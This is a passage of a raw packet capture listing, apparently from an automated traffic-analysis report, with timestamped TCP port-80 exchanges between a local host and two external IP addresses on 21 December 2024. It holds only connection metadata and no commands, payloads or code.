                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.042784929 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.042829990 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.043019056 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.043059111 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.043102980 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.043144941 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.044176102 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.044219017 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.044264078 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.044305086 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.045337915 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.045377016 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.045453072 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.045495987 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.046493053 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.046535015 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.046577930 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.046716928 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.047739029 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.047782898 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.047801971 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.047842979 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.048854113 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.048901081 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.048964024 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.049005032 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.050030947 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.050067902 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.050184011 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.050224066 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.051156044 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.051192045 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.051263094 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.051300049 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.052357912 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.052401066 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.052437067 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.052474976 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.053236008 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.053277969 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.053291082 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.053334951 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.053913116 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.053953886 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.054043055 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.054083109 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.055100918 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.055140972 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.055161953 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.055202007 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.056233883 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.056272984 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.056343079 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.056381941 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.057389975 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.057430029 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.057476997 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.057514906 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.058588028 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.058628082 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.058686972 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.058726072 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.059760094 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.059798956 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.060002089 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.060040951 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.060894012 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.060934067 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.060995102 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.061033964 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.062048912 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.062088966 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.062164068 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.062202930 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.063218117 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.063256025 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.063308001 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.063348055 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.064378977 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.064420938 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.064490080 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.064534903 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.065540075 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.065579891 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.065637112 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.065675020 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.066747904 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.066791058 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.066939116 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.066977978 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.067883968 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.067922115 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.067924976 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.067960024 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.069032907 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:18.069072962 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:20.429764986 CET4982380192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:20.430129051 CET4985280192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:20.549604893 CET8049852185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:20.549633026 CET8049823185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:20.549782038 CET4985280192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:20.549788952 CET4982380192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:20.549946070 CET4985280192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:20.669445038 CET8049852185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:21.883877039 CET8049852185.215.113.43192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:21.884610891 CET4985280192.168.2.5185.215.113.43
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:21.887362957 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:21.887595892 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:22.007159948 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:22.007236958 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:22.007237911 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:22.007297039 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:22.007539034 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:22.126967907 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.328876972 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.328912973 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.328929901 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.328958035 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.329000950 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.329047918 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.329063892 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.329077959 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.329093933 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.329099894 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.329125881 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.329154968 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.329211950 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.329226971 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.329266071 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.329339981 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.329389095 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.448837042 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.448957920 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.449009895 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.452971935 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.453056097 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.453056097 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.453100920 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.521004915 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.521045923 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.521055937 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.521100044 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.523411036 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.523464918 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.523479939 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.523525953 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.531820059 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.531867027 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.531919003 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.531961918 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.540195942 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.540246010 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.540371895 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.540469885 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.548702002 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.548789978 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.548808098 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.548871994 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.556962013 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.557030916 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.557068110 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.557110071 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.565278053 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.565337896 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.565422058 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.565475941 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.573708057 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.573771954 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.573802948 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.573848009 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.582058907 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.582178116 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.582218885 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.589747906 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.589903116 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.589946985 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.597335100 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.597420931 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.597465038 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.604967117 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.605016947 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.605031013 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.605065107 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.642541885 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.642591000 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.713493109 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.713542938 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.713649035 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.713704109 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.714679003 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.714695930 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.714740992 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.719288111 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.719434023 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.719506025 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.724118948 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.724136114 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.724194050 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.728538036 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.728669882 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.728740931 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.733140945 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.733158112 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.733206034 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.737730026 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.737871885 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.737940073 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.742182970 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.742257118 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.742305040 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.746639013 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.746699095 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.746733904 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.746774912 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.751033068 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.751097918 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.751164913 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.751211882 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.755485058 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.755547047 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.755595922 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.759926081 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.760013103 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.760062933 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.764297962 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.764352083 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.764358997 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.764405966 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.768811941 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.768954039 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.768997908 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.773173094 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.773260117 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.773302078 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.776726961 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.776848078 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.776896954 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.780245066 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.780296087 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.780380011 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.780426979 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.783828974 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.783873081 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.783950090 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.784012079 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.787367105 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.787419081 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.787486076 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.787528038 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.790930033 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.790980101 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.790999889 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.791045904 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.794457912 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.794506073 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.794549942 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.794612885 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.798046112 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.798111916 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.798130989 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.798177958 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.905654907 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.905715942 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.905878067 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.905924082 CET4985880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.906965017 CET804985831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:23.907013893 CET4985880192.168.2.531.41.244.11
